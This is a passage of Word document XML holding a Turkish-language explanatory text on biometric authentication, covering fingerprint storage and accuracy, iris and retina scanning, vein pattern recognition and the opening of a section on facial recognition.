        <w:t xml:space="preserve">Depolama gereksinimleri. Parmak izi sistemleri, parmağın tüm görüntüsünü veya karşılaştırma için eşleşme noktalarının bir gösterimini saklar. ABD Federal Araştırma Bürosu dijitalleştirilmiş görüntüleri 256 gri </w:t>
      </w:r>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>seviyeli, inç başına 500 piksel çözünürlükte depolar. Bu standartla, 1,5 inç kare boyutunda tek bir parmak izi görüntüsü, parmak izi kartı başına yaklaşık 10 megabayt veri kullanır. Yerden tasarruf etmek için, birçok parmak izi depolama sistemi görüntünün tamamı yerine yalnızca sırtlar, oluklar ve minutialar hakkında bilgi depolar. Bu sistemler için depolama gereksinimi, görüntü başına tipik olarak 250 ila 1000 bayttır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk. Parmak izi tarama sistemleri, yanlış pozitiflerden daha fazla yanlış negatif (yani meşru bir kullanıcıyı tanımakta başarısızlık) sergileme eğilimindedir. Piyasadaki çoğu parmak izi sistemi, yanlış görüntülerin sunumunu tespit etmeye çalışmak için çeşitli yöntemler kullanır. Örneğin, birisi meşru bir kullanıcı sisteme eriştikten hemen sonra sensörde gizli baskı kalıntısı kullanmaya çalışabilir veya hatta artık orijinal sahibine bağlı olmayan bir parmak kullanmaya çalışabilir. Bununla mücadele etmek için, birçok sensör bir parmağın canlı olup olmadığını ve insan yapımı malzemelerden (lateks veya plastik gibi) yapılmadığını belirlemek için özel ölçümler kullanır. Kan akışı, kan-oksijen seviyesi, nem, sıcaklık, nabız veya cilt iletkenliği için ölçümlerin tümü bu tehditle mücadelede kullanılan yöntemlerdir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Göz tarama (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eye Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnsan gözü, biyometrik ölçümlerde kullanım için en benzersiz ve ayırt edici özelliklerden bazılarını içerir. Göze dayalı biyometriklerin en yaygın iki şekli, iris tanıma ve retina tanımadır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nasıl çalışır. Bir kişinin irisini tarama işlemi, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gözbebeğini</w:t>
      </w:r>
      <w:r w:rsidRPr="00F03276">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> çevreleyen renkli dokuyu analiz etmekten oluşur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0064106A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0064106A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Taramalar standart bir video kamera kullanıyor ve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>denek</w:t>
      </w:r>
      <w:r w:rsidRPr="0064106A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gözlük taksa bile 2 ila 18 inç mesafede</w:t>
      </w:r>
      <w:r w:rsidRPr="0064106A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> çalışacak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tır</w:t>
      </w:r>
      <w:r w:rsidRPr="0064106A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006D0FC1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006D0FC1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İris taraması tipik olarak üç ila beş saniye sürer. Buna karşılık, retinal tarama, gözün arkasında bulunan kan damarlarını analiz eder.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Retina taraması, kullanıcının retinasını zıplayan düşük yoğunluklu bir yeşil ışık kaynağının kullanılmasını içerir ve ardından desenleri analiz etmek için tarayıcı tarafından okunur.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bununla birlikte, kullanıcının gözlükleri çıkarmasını, gözünü okuma cihazına yakın bir yere koymasını ve uzunca küçük yeşil bir ışığa odaklanmasını gerektirir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C162C1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcının başını sabit tutması ve gözünün birkaç saniye boyunca ışığa odaklanması gerekir; bu sırada cihaz kullanıcının kimliğini doğrular. Retina taramaları genellikle on ila on iki saniye sürer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eşleşme </w:t>
      </w:r>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noktaları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004E0EAB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E0EAB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İrisin içinde halkalar, oluklar ve çiller dahil olmak üzere 200'den fazla kullanılabilir kibrit noktası var. Retina taramaları, doğru şablonlar oluşturmak için 400 ila 700 farklı nokta arasında ölçüm yapar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B35DB3">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. Bir iris taraması için tipik şablon boyutu 256 ila 512 bayttır. Çoğu retina taraması daha küçük bir şablonda, genellikle 96 baytta saklanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467BAC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk. Gözlerin insanlar arasındaki benzersizliği, göz taramasını biyometrik kullanım için çok güçlü bir aday yapar. Bu benzersizlik aynı kişinin sol ve sağ gözleri arasında bile var. Bir retinayı çoğaltmanın bilinen bir yolu yoktur ve ölü bir kişiden gelen retina aşırı derecede kötüleşir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00467BAC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00467BAC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Göz tarama teknolojisini kullanan yanlış pozitif olma olasılığı son derece düşüktür ve göreceli hızı ve kullanım kolaylığı güvenlik ve tanımlama uygulamaları için etkili bir seçimdir. Göz taramasının biyometrik olarak önündeki dezavantajları, taranması gereken kullanıcılar arasındaki sosyal </w:t>
      </w:r>
      <w:r w:rsidRPr="00467BAC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ve sağlık sorunlarıdır. İnsanlar genellikle bir şeyin doğrudan gözlerine parlamasını sağlamaktan rahatsızdırlar ve ortaya çıkabilecek kalıcı sağlık etkileri konusunda endişelenirler. Bu sorun, tarama ışığına maruz kalma süresinin daha uzun olduğu retina tarama sistemleri kullanıcıları arasında daha belirgindir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C01E93">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Damar Desenleri (Vein Patterns )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C01E93">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Damar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>desen</w:t>
      </w:r>
      <w:r w:rsidRPr="00C01E93">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tanıma, insan vücudunda, özellikle de insan elinin çevresinde, eşsiz yüzey ve deri altı damarlarını kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560805">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nasıl çalışır. Özel bir kamera ve kızılötesi sensör, avuç içi, el bileği veya elin arkasındaki damarların görüntüsünü alır. Görüntü daha sonra bir şablona sayısallaştırılır ve karşılaştırma için kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">eşleşme </w:t>
      </w:r>
      <w:r w:rsidRPr="00776E24">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noktaları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D7A5C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Görüntüler, her bireye özgü damarlardaki ağaç desenlerini gösterir ve damarlar ve diğer deri altı özellikleri, büyük, sağlam, kararlı ve büyük ölçüde gizli desenler sunar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00066D26">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depolama gereksinimleri. Damar tarayıcıdan üretilen şablon yaklaşık 250 bayttır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F549E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Doğruluk.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Benzersiz damar dağılımı deseni</w:t>
      </w:r>
      <w:r w:rsidRPr="00066D26">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> oldukça stabildir ve bir kişinin yaşa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mı boyunca aynı kalır.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F549E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F549E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bakımdan, damar desenleri tanımlanması için oldukça kararlı bir biyometrik sağlar.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F549E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F549E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sosyal olarak kabul edilebilirlik ile ilgili olarak, damar tanımada parmak izi uygulamasının sahip olduğu birçok cezai uygulama yoktur. Son olarak, damar örüntüleri, hafta sonu bahçeciliği veya duvarcılık gibi normal kullanım nedeniyle parmak izlerinin sık sık maruz kaldığı geçici hasarlara maruz değildir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Buna rağmen, damar</w:t>
      </w:r>
      <w:r w:rsidRPr="009F549E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> taraması diğer biyometrik ölçümlerin bazılarının gördüğü yaygın yayılımı görmemişt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r w:rsidRPr="00576B90">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yüz tanıma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00576B90">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Facial Recognition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099338C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yüz tanıma teknolojisi, belirli yüz özelliklerinin analiz edilmesini, bir veri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0099338C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tabanında saklanmasını ve sistemlere erişen kullanıcıları belirlemek için bunları kullanmayı içerir.</w:t>
      </w:r>
      <w:r w:rsidRPr="006162B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006162B6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İnsanların tek bir yüzü tekinsiz bir hassasiyetle tanıma doğal bir yeteneği vardır, ancak nispeten yakın zamana kadar bu görevi otomatik olarak ele almak için bir sistem geliştirmenin son derece zor olduğu kanıtlanmıştır. Bilimsel araştırma ve hesaplama gücündeki son gelişmeler yüz tanıma teknolojisini biyometrik güvenlik için güçlü ve doğru bir seçim haline getirmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nasıl çalışır. Yüz tanıma, insan yüzünün bir kişinin kullanım ömrü boyunca çok az değişen, göz yuvalarının üst kısımları, yanak kemikleri etrafındaki alan ve ağzın yanları dahil olmak üzere özellikleri olduğu ilkesine dayanır. Tipik bir yüz tanıma sisteminde, kullanıcı üç ila dört saniye boyunca bir ila iki feet mesafedeki bir kameraya bakar. Birkaç farklı yüz tanıma türü vardır. MIT'de geliştirilen Eigenface (özyüz), farklı yüz özelliklerini temsil eden iki boyutlu gri ölçekli görüntüler kullanır. Yüzlerin çoğu, sayısal katsayılara dönüştürülen 100 ila 125 özyüz (eigenface)  kullanılarak yeniden oluşturulabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Analiz sırasında, “canlı” yüz aynı işlem kullanılarak analiz edilir ve sonuçlar depolanan katsayılarla karşılaştırılır. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yüz hattı a</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nalizi yöntemi, yüzün farklı yerlerinden düzinelerce yüz özelliğini ölçer.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yüz hattı</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4532">
        <w:rPr>
